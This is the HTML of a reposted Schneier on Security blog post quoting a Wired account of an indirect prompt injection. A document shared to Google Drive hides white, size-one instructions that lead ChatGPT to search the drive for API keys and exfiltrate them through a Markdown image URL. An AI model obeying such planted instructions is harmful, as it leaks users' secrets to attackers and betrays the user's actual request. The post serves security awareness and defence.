Código HTML do Conteúdo

Post: We Are Still Unable to Secure LLMs from Malicious Inputs - Schneier on Security - Against Invaders - Notícias de CyberSecurity para humanos.

<div id="page"> <div id="content"> <div id="primary"> <main id="main"></p> <article id="post-3492"> <div> <div> <article id="post-70633"> <div> <p>Nice <a href="https://www.wired.com/story/poisoned-document-could-leak-secret-data-chatgpt/" target="_blank">indirect prompt injection attack</a>:</p> <blockquote> <p>Bargury&rsquo;s attack starts with a poisoned document, which is <a href="https://support.google.com/drive/answer/2375057?hl=en-GB&amp;co=GENIE.Platform%3DDesktop" target="_blank">shared</a> to a potential victim&rsquo;s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.</p> <p>In a <a href="https://www.youtube.com/watch?v=JNHpZUpeOCg" target="_blank">proof of concept video of the attack</a>, Bargury shows the victim asking ChatGPT to &ldquo;summarize my last meeting with Sam,&rdquo; referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a &ldquo;mistake&rdquo; and the document doesn&rsquo;t actually need to be summarized. The prompt says the person is actually a &ldquo;developer racing against a deadline&rdquo; and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.</p> <p>That URL is actually a command in the <a href="https://www.wired.com/story/the-eternal-truth-of-markdown/" target="_blank">Markdown language</a> to connect to an external server and pull in the image that is stored there. But as per the prompt&rsquo;s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.</p> </blockquote> <p>This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don&rsquo;t know to defend against the attack.</p> <p> <span>Tags: <a href="https://www.schneier.com/tag/ai/" rel="tag" target="_blank">AI</a>, <a href="https://www.schneier.com/tag/cyberattack/" rel="tag" target="_blank">cyberattack</a>, <a href="https://www.schneier.com/tag/llm/" rel="tag" target="_blank">LLM</a></span> </p> <p> <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html" rel="bookmark" target="_blank">Posted on August 27, 2025 at 7:07 AM</a> &bull;<br /> <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html#respond" target="_blank">0 Comments</a> </p> </div> </article> <p id="powered">Sidebar photo of Bruce Schneier by Joe MacInnis.</p> </p></div> </p></div> </article> <p> </main> </div> </p></div> </div>